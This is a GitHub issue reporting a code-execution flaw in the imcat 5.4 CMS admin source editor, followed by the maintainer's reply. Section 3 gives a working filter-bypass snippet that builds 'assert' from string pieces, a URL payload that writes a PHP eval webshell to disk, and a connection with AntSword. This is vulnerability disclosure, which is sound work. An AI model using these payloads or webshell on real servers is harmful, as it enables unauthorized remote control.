search

peacexie / imcat

Imcat(贴心猫) is a set of Light weight, Free, Sharing general PHP web application system!
http://imcat.txjia.com/
19 stars 7 forks source link

Code Execution Vulnerability in the background of imcat5.4 #8

Open haungtongfu opened 3 years ago

haungtongfu commented 3 years ago

1. Overview

Official website: http://txjia.com/imcat/

Version: imcat-5.4

Vulnerability type: Code Execution

Source code: https://github.com/peacexie/imcat/releases/tag/v5.4

PS: it is recommended to use php7.0.12 environment. Other environments will have different problems when loopholes recur

2. Source code analysis

In the background of the CMS, an online source code editing function is provided, and then dangerous functions are filtered through the file imcat-5.4, imcat, core, glib and safscan.php. However, due to the incomplete filtering rules of the filtering function, dangerous code can be written and executed, forming a loophole in code execution, The attacker can gain the permission of the server through this vulnerability image

3. Reappearance

Use phpstudy to build the environment, and then log in to the background of the website

(1) Select tool - DIY configuration - select any file to modify. I choose index. PHP here image

(2) Try to write a sentence image Then save it and find an error, because the filter rule in imcat-5.4, imcat, core, glib, safscan.php file is triggered image

(3) Try to write $ch = explode(".","hello.ass.world.er.t"); $c = $ch[1].$ch[3].$ch[4]; //assert $d=$_GET['x']; $c($d); Successfully bypassed image image

(4) Visit http://127.0.0.1/imcat/index.php?x= fputs(fopen('shell.php','w'),'<?php @eval($POST[a])?>') This statement means to create a shell.php file in the same directory as index.php and write a sentence "Trojan horse <? php @eval($ POST[a])?> Although the page is wrong in reality, the statement has been executed successfully and shell.php has been generated in the same directory image

(5) Use ant sword to connect

http://127.0.0.1/imcat/shell.php image image

4. Repair service suggestions

(1) Turn off the function of modifying the source code in the background

(2) Perfect the rules of detection (this is hard to implement)

peacexie commented 3 years ago

As you said: "Perfect the rules of detection (this is hard to implement)": Good!, These code run before the filter code, And in the DIY mode, You can remove the filter code too!

But, You can use master branch! It was disabled by default at in master branch.

Sorry! The DIY-mode, It was disabled by default only at master branch. In v5.4, this feature was not update.

haungtongfu commented 3 years ago

I suggest that DIY be disabled by default. Good luck

haungtongfu commented 3 years ago

Can this vulnerability help me apply for a CVE? thank you! Requesting a CVE identification number-GitHub Docs image

Thinks.